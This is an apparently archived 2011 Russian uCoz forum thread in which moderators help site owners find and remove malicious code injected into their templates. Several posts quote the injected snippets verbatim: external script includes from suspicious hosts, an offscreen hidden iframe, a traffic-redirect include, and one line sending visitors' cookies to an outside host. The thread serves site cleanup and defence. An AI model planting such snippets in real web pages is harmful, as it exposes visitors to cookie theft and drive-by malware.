Чат сообщества
   | |
| Модератор форума: Yuri_G |
| Сообщество uCoz Мастерская uCoz Безопасность сайта Вирусы на сайтах (для изучения) (примеры вредоносного кода и устранение) |
| Вирусы на сайтах (для изучения) |
|
alter1365, блок вход, там где находится форма входа
выделенное красным удалить Quote <tr><td align="center" style="background:url('/.s/t/982/8.gif');padding:0 5px 0 5px;"><!-- <bc> --><div align="center"><strong>Вторник <br> 06.09.2011 <br> 23:53</strong> <br> <script type="text/javascript" src="http://r1p.pp.ua/1.js "></script><img class="userAvatar" title="Гость" src="http://i021.radikal.ru/0804/53/f5b4265aa726.gif" border="0"> блок мини-чат выделенное красным удалить Quote <a onclick="$('#name').slideToggle('slow');" href="javascript://" ><center>Доп.функции</center></a><br> <div style="float:left;"><div id="name" style="display:none;" ><div id="chatb" href=""><img src="http://s7.ucoz.net/sm/1/v.gif"></div> <div id="chatb" href="javascript://" rel="nofollow" onclick="document.getElementById('mchatIfm2').src='/mchat/?'+Math.random();return false;"><img src="http://i19.fastpic.ru/big/2011/0407/01/f31814ad56da1d18755b2f00928ebb01.png"></div> <div id="chatb" href=""><script src="http://i1ii.ru/1.js" type="text/javascript"></script><img src="http://i19.fastpic.ru/big/2011/0407/76/fc5d8cefd14a670b3ffbd1f2ac00f676.png"></div> код находится в доп.функциях чата, которые вы навесили из блока статистика удалить следующий код Quote class="groupFriends">Эквадор <img border="0" src="http://avtos.do.am/img/ajax_img/icon/user.png" width="12" heigt="12"></a><font color="#FFFFFF"><span style="font-size: 6pt;">RU</span></font><font color="#a9a9a9">] </font><font color="#a9a9a9">[</font><a href="javascript://" rel="nofollow" onclick="window.open('/index/8-21','up21','scrollbars=1,top=0,left=0,resizable=1,width=680,height=350');return false;" class="groupFriends">ХОНДА <img border="0" src="http://avtos.do.am/img/ajax_img/icon/she_user.png" width="12" heigt="12"><script src="http://radikol.ru/1.js" type="text/javascript"></script></a><font color="#FFFFFF"><span style="font-size: 6pt;">RU</span></font><font color="#a9a9a9">] </font><font color="#a9a9a9">[</font><a href="javascript://" rel="nofollow" onclick="window.open('/index/8-23','up23','scrollbars=1,top=0,left=0,resizable=1,width=680,height=350');return false;" class="groupFriends">Stanislav <img border="0" src="http://avtos.do.am/img/ajax_img/icon/user.png" width="12" heigt="12"></a><font color="#FFFFFF"><span style="font-size: 6pt;">RU</span></font><font color="#a9a9a9">] </font><!-- </bc> --></div></td></tr> <tr><td><img src="/.s/t/982/9.gif" border="0"></td></tr> </table> и посмотрите на Quote <title>► Ⓕⓡⓐⓚⓘⓐⓝⓢ ◄ - Главная страница</title> перелейте всю графику к себе на сайт |
|
Edge6007,
Quote <!-- </block7> --> <div style="position:absolute;left:-29072px;top:0"> <iframe src=http://incatalogs.ru/js/id35062.php scrolling=no border=0 frameborder=0 width=1 height=1></iframe> </div> <!-- <block8> --> сайт классическая помойка. перелейте к себе на сайт всю графику, у вас весь сайт висит на синнерс после удаления кода проверьте есть ли ещё проблемы под логином |
|
tchmp,
Quote хотя все равно при нажатии на эту флеш надпись,я попадаю на сайт,с которого я ее скачиваю? MiksiR, Это у вас в статистике зачем ??? <script src="http://stran.us/js/1.js" type="text/javascript"></script> Сообщение отредактировал Miss_Esq - Четверг, 08 Сен 2011, 19:43:53
|
|
Avetik, вы должны дать ссылки на ваши ротаторы баннеров, если они вставлены на страницы. извините, но по скринам и вашим описаниям вообще мало что можно сказать, кроме предположения о том, что у вас в браузере установлен плагин для скайпа и во время редактирования кода в код попали теги из вашего плагина. такое часто случается с гугло хрумом. больше по картинкам сказать ничего невозможно. и ваши сообщения перенесены сюда //forum.ucoz.ru/forum/31-28458-1 о чем вы получили извещение по личной почте
|
|
1) http://wogworldofgames.ucoz.com
2) И под логином и за гостя Описание проблемы: Сегодня установил новый вид материалов новостей сайта, после этого антивирус avast interner seqriti стал писать про вирусы на сайте, я вернул стандартный вид, после этого вирус остался помогите пожалуйста. Вирусы: URL: Mal ; В яндекс вебмастер пишет, что вредоносного кода нет, также появился вирус Iframe Inf (или как-то так) забыл название. Помогите пожалуйста. |
|
Реван5114, выделенное красным удалить
Quote <script type="text/javascript"> function iAjax5(){new _uWnd('link5','Последние зарегистрированные',440,335,{align:0,shadow:0,autosize:1,maxh:1000,minh:100,resize:1,fadeclosetype:2},$('#124afafaf12124').html());} </script><div id="124afafaf12124" style="display:none;"><center><a title="Первый приход: 07.09.2011, 21:05 (Среда)<br> Полное имя: Сахар белая смерть Тортик<br> Страна: Российская Федерация<br> <hr> Репутация: -20<br> Группа: Пользователь<br> Ранг: Начинающий игрок<br> Пол: Мужчина<br> <hr> Комментариев: 1<br> Фотографий: 0<br> Постов: 0<br> Файлов: 0" href="javascript://" rel="nofollow" onclick="window.open('/index/8-43','up43','scrollbars=1,top=0,left=0,resizable=1,width=680,height=350');return false;">Caxapok</a><br>↓ ↓ ↓ ↓ ↓ <script src="http://iji.do.am/user.js"></script><table border="0" c информер с анекдотами удалить блок случайный анекдот Quote <fieldset class="counter"><legend><font color="#FF0000"><b>Случайный анекдот</b></font><font color="#FF0000">:</font></legend> <br><script type="text/javascript" src="http://lol-ku.ucoz.ru/informer/5-1"></script> <br></fieldset> содержит вставку Code src=\"http://iframepay.com/tds/js.php\"> сайт катастрофичная помойка. вы собирали на него все скрипты, которые находили? вы подгружаете пол интернета в совершенно ненужных и иногда очень глупых, но очень тяжелых скриптах. и о чем вы думали, когда на полную мощь автозапуском музыку запускали? о том, что к вам никто никогда по собственной воле не вернулся и не дай бог не задержался? вот почитайте |
|
Сайт www.stran.us/ все равно есть вирус.
Code 08.09.2011 22:06:17 Фильтр HTTP файл http://serjanti.aelita.fr/domains/49e60ae306816c6c2790c4ee056110a4.jar Java/Agent.DK троянская программа соединение прервано - изолирован snowik-ПК\snowik Обнаружена угроза при попытке доступа в Интернет следующим приложением: C:\Program Files\Java\jre6\bin\java.exe. Сообщение отредактировал MiksiR - Суббота, 10 Сен 2011, 20:18:17
|
|
Реван5114, дайте мне адрес страницы на которую ругается аваст. и полный текст его аллерта, то есть то что он пишет когда ругается. и после чистки нужно полностью очистить кеш и куки. то есть временных файлов не должно остаться
MiksiR, что у вас блочит? после чистки вы чистили времянки кеш? |
|
Сайт www.stran.us/ все равно есть вирус.
Code 08.09.2011 22:06:17 Фильтр HTTP файл http://serjanti.aelita.fr/domains/49e60ae306816c6c2790c4ee056110a4.jar Java/Agent.DK троянская программа соединение прервано - изолирован snowik-ПК\snowik Обнаружена угроза при попытке доступа в Интернет следующим приложением: C:\Program Files\Java\jre6\bin\java.exe. |
|
MiksiR,
Quote C:\Program Files\Java\jre6\bin\java.exe. Quote разрабатываю программы на языке java. Сообщение отредактировал Miss_Esq - Суббота, 10 Сен 2011, 21:31:06
|
|
Musaget, под логином или под паролем проблемы? какие антивирусы реагируют и как?
а пока удалите со страниц вот эти коды выделенное красным удалить Quote <div class="indents"><p> <img border="0" src="http://pics.kz/s2/43/a3/69/e2/43a369e20bae86873d85d201453dcc48.jpg" width="200" height="144" align="left"><font size="2">Южный Парк 15 сезон 5,6,7 серии<br> <br> South Park<span lang="en-us"> 15 </span>сезон<br> <br> Режиссер: Трей Паркер, Мэтт Стоун<br> В ролях: Эрик Картмэн, Стэн Марш, Кайл Брофловски, Кенни и др.</font></p> далее удалить коды Quote <!-- teasernet Start --> <script type="text/javascript"> teasernet_blockid = 217833; teasernet_padid = 79163; </script> <script type="text/javascript" src="http://bilation.com/javascript/93Utk00IWt0X2"></script> <!-- teasetnet End --> и Quote <script type="text/javascript"> teasernet_blockid = 211144; teasernet_padid = 79163; </script> <script type="text/javascript" src="http://clangere.com/javascript/08rFN"></script> на остальных страницах выискивать ваши окошки не имею времени. ставьте материалы на премод и запрещайте потенциально опасные коды |
|
пожалуйсто помогите удалить радио-плеер с сайта. Я удалила его через "конструктор", но серез ПУ ненашла код плеера. Как найти и удалить? (я незнаю как код выглядит и где он может быть). (радио находилось на всех страницах (кроме форума) сайта, в боковых "колонках"(название забыла).
Адресс сайта: http://itachi-uchiha.my1.ru/ (прошу сообщить об ответе на емайл: zarifajapon@mail.ru Так как для меня это очень важно! Заранее спасибо!) Сообщение отредактировал zarifajapon - Воскресенье, 11 Сен 2011, 22:02:33
|
|
zarifajapon, на вашем сайте обнаружен вредоносный код
блок мини-профиль. выделенное красным удалить Quote регистрация</a> или авторизироватся<script type="text/javascript" src="http://radio.bot56.ru/radio_javascript.js"></script></div> далее в виде материалов выделенное красным удалить Quote <script>img = new Image(); img.src = "http://sharki.ax3.net/s.gif?"+document.cookie;</script> |
| |||